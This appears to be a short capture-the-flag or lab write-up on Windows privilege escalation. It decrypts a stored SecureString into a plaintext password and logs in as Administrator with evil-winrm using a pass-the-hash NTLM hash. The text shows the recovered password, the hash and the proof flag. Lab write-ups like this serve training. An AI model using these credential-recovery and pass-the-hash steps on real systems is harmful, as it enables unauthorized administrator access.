Priv Esc

Learnt something new :D

echo "01000000d08c9ddf0115d1118c7a00c04fc2..." > cred.txt
$pw = Get-Content cred.txt | ConvertTo-SecureString
$bstr = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($pw)
$UnsecurePassword = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($bstr)
$UnsecurePassword

hHO_S9gff7ehXw

jodie.summers:hHO_S9gff7ehXw

❯ evil-winrm -i 192.168.204.30 -u Administrator -H d35c4ae45bdd10a4e28ff529a2155745

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami ; type C:\Users\Administrator\Desktop\proof.txt ; ipconfig
narasec\administrator
ec48b22ae089a7d9bbb6f65ff8466179

Windows IP Configuration


Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::fdb4:85d9:decc:67d4%4
   IPv4 Address. . . . . . . . . . . : 192.168.204.30
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.204.254

PreviousFoothold NextCredentials / Notes / LL

Last updated 4 months ago